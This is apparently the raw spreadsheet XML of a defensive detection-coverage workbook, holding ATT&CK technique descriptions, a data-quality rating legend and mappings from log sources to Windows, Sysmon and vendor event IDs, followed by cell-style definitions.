Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>Use case</t>
  </si>
  <si>
    <t>Data source(s) used</t>
  </si>
  <si>
    <t>Upkeep</t>
  </si>
  <si>
    <t>REF: Datasources mentioned in the framework</t>
  </si>
  <si>
    <t>123-zxy-name</t>
  </si>
  <si>
    <t>Process use of network,Process Monitoring</t>
  </si>
  <si>
    <t>123-zxy-name2</t>
  </si>
  <si>
    <t>Process Monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>123-zxy-mimilove</t>
  </si>
  <si>
    <t>Rating Legend</t>
  </si>
  <si>
    <t>Per event</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>number, min 0 max 5</t>
  </si>
  <si>
    <t>The amount of systems that have this event type available out of the total amount of systems that could be able to have it</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Hours = 1, under 30 minutes = 3, under 5 minutes to real-time = 5</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Not available = 0, Locally available = 2, Centrally available = 5</t>
  </si>
  <si>
    <t>Per datasource</t>
  </si>
  <si>
    <t>0 - 100</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">It should add up to 100 per </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>DataSource</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>, separated by a ;</t>
    </r>
  </si>
  <si>
    <t>The total amount of DataSources per technique needs to be equal to the amount of weights</t>
  </si>
  <si>
    <t>DataSource</t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Access Tokens</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Symantec</t>
  </si>
  <si>
    <t>Kaspersky</t>
  </si>
  <si>
    <t>Windows Defender:1116,1117,1006,1008</t>
  </si>
  <si>
    <t>Asset management</t>
  </si>
  <si>
    <t>Windows:4624</t>
  </si>
  <si>
    <t>Windows:4625</t>
  </si>
  <si>
    <t>Windows:4769</t>
  </si>
  <si>
    <t>AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS OS logs</t>
  </si>
  <si>
    <t>Azure activity logs</t>
  </si>
  <si>
    <t>Azure OS logs</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Component firmware</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Windows:4657</t>
  </si>
  <si>
    <t>Detonation Chamber</t>
  </si>
  <si>
    <t>Cuckoo sandbox</t>
  </si>
  <si>
    <t>FireEye</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>Bro Cert.log</t>
  </si>
  <si>
    <t>Disk Forensics</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>Sysmon:7</t>
  </si>
  <si>
    <t>DNS Records</t>
  </si>
  <si>
    <t>Windows DNS log</t>
  </si>
  <si>
    <t xml:space="preserve">Infoblox </t>
  </si>
  <si>
    <t>Sysmon:22</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Windows:4663</t>
  </si>
  <si>
    <t>Sysmon:2</t>
  </si>
  <si>
    <t>Sysmon:11</t>
  </si>
  <si>
    <t>Sysmon:15</t>
  </si>
  <si>
    <t>Windows:5140,5145</t>
  </si>
  <si>
    <t>Windows:4656</t>
  </si>
  <si>
    <t>Windows:4670</t>
  </si>
  <si>
    <t>Host network interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Sysmon:6</t>
  </si>
  <si>
    <t>Windows:5038,6281</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Mail server</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Palo Alto:WildFire</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Named Pipes</t>
  </si>
  <si>
    <t>Sysmon:17</t>
  </si>
  <si>
    <t>Sysmon:18</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>Palo Alto:DeviceLog</t>
  </si>
  <si>
    <t>Network intrusion detection system</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>Bro logging</t>
  </si>
  <si>
    <t>PaloAlto:TrafficLog</t>
  </si>
  <si>
    <t>OAuth audit logs</t>
  </si>
  <si>
    <t>Office 365 account logs</t>
  </si>
  <si>
    <t>Office 365 trace logs</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>Moloch</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>PowerShell:200-500</t>
  </si>
  <si>
    <t>PowerShell:4100-4104</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>Windows:4688</t>
  </si>
  <si>
    <t>Sysmon:1</t>
  </si>
  <si>
    <t>Windows:4689</t>
  </si>
  <si>
    <t>Sysmon:5</t>
  </si>
  <si>
    <t>Sysmon:8</t>
  </si>
  <si>
    <t>Sysmon:10</t>
  </si>
  <si>
    <t>Windows Scheduled Tasks:100-200</t>
  </si>
  <si>
    <t>Windows Whitelist:8000-8027</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Windows:5156</t>
  </si>
  <si>
    <t>Sysmon:3</t>
  </si>
  <si>
    <t>Windows:5157</t>
  </si>
  <si>
    <t>Windows:5158</t>
  </si>
  <si>
    <t>Windows:5159</t>
  </si>
  <si>
    <t>Windows:5031</t>
  </si>
  <si>
    <t>Windows:5154</t>
  </si>
  <si>
    <t>Windows:5155</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Sysmon:4</t>
  </si>
  <si>
    <t>Sysmon:16</t>
  </si>
  <si>
    <t>Windows:6005</t>
  </si>
  <si>
    <t>Windows Defender:1005,1006,1008,1010,2001,2003,2004,3002,5008</t>
  </si>
  <si>
    <t>Windows:1100</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Windows Firewall:2003</t>
  </si>
  <si>
    <t>Windows:7040</t>
  </si>
  <si>
    <t>Windows:7045</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>Palo Alto:ThreatLog</t>
  </si>
  <si>
    <t>BlueCoat trafficlog</t>
  </si>
  <si>
    <t>Stackdriver logs</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Web application firewall logs</t>
  </si>
  <si>
    <t>F5 logs</t>
  </si>
  <si>
    <t>Nginx logs</t>
  </si>
  <si>
    <t>Web proxy</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows:1000,1001</t>
  </si>
  <si>
    <t>Windows:4724, 4738,4728,4732</t>
  </si>
  <si>
    <t>Windows:1102</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Sysmon:12</t>
  </si>
  <si>
    <t>Sysmon:13</t>
  </si>
  <si>
    <t>Sysmon:14</t>
  </si>
  <si>
    <t>Windows:4660</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Windows WMI:5857,5860,5861</t>
  </si>
  <si>
    <t>Sysmon:19</t>
  </si>
  <si>
    <t>Sysmon:20</t>
  </si>
  <si>
    <t>Sysmon:21</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t>File monitoring,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,BIOS,EFI</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>File monitoring,Services,Process command-line parameters</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</t>
  </si>
  <si>
    <t>Windows Registry,Kernel drivers,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</t>
  </si>
  <si>
    <t>API monitoring,MBR,VBR</t>
  </si>
  <si>
    <t>File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>PowerShell logs,Loaded DLLs,DLL monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Authentication logs,Process command-line parameters</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Services,Windows Registry,Process command-line parameters,Anti-virus</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Host network interface,Network intrusion detection system,Network protocol analysis</t>
  </si>
  <si>
    <t>File monitoring,Kernel drivers,API monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Authentication logs,API monitoring,Windows event logs,Packet capture</t>
  </si>
  <si>
    <t>Anti-virus,Authentication logs,File monitoring,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>Disk forensics,API monitoring,Process monitoring,Component firmware</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows Registry,DLL monitoring,Loaded DLLs</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Access tokens,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</t>
  </si>
  <si>
    <t>Loaded DLLs,System calls,Windows Registry,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,User interface,PowerShell logs</t>
  </si>
  <si>
    <t>Windows event logs,PowerShell logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Process monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>DLL monitoring,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>API monitoring,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</t>
  </si>
  <si>
    <t>Kernel drivers,MBR</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process monitoring,PowerShell logs,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Authentication logs</t>
  </si>
  <si>
    <t>OAuth audit logs,Office 365 account logs</t>
  </si>
  <si>
    <t>Azure OS logs,AWS CloudTrail logs,Azure activity logs,Stackdriver logs,AWS OS logs</t>
  </si>
  <si>
    <t>80;20</t>
  </si>
  <si>
    <t>10;35;20;35</t>
  </si>
  <si>
    <t>94,67</t>
  </si>
  <si>
    <t>Technique Name</t>
  </si>
  <si>
    <t>8;8;8;8;8;8;8;4;8;8;8;8;8</t>
  </si>
  <si>
    <t>12;12;12;12;14;12;14;12</t>
  </si>
  <si>
    <t>25;15;20;30;10</t>
  </si>
  <si>
    <t>30;25;25;20</t>
  </si>
  <si>
    <t>9;9;9;9;9;10;9;9;9;9;9</t>
  </si>
  <si>
    <t>Data Sources</t>
  </si>
  <si>
    <t>10;20;20;20;10;20</t>
  </si>
  <si>
    <t>34;33;33</t>
  </si>
  <si>
    <t>10;10;10;10;10;10;10;10;10;10</t>
  </si>
  <si>
    <t>10;10;10;10;20;10;20;10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</si>
</sst>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1"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF0C1B33"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF333333"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0" tint="-0.34998626667073579"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>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0C1B33"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8" tint="0.39994506668294322"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="6">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top style="thin">
        <color theme="4"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FFCCCCCC"/>
      </left>
      <right style="medium">
        <color rgb="FFCCCCCC"/>
      </right>
      <top style="medium">
        <color rgb="FFCCCCCC"/>
      </top>
      <bottom style="medium">
        <color rgb="FFCCCCCC"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color theme="4"/>
      </left>
      <right style="thin">
        <color indexed="64"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="2">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="57">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0"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xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="1" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top"/>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3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="12" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
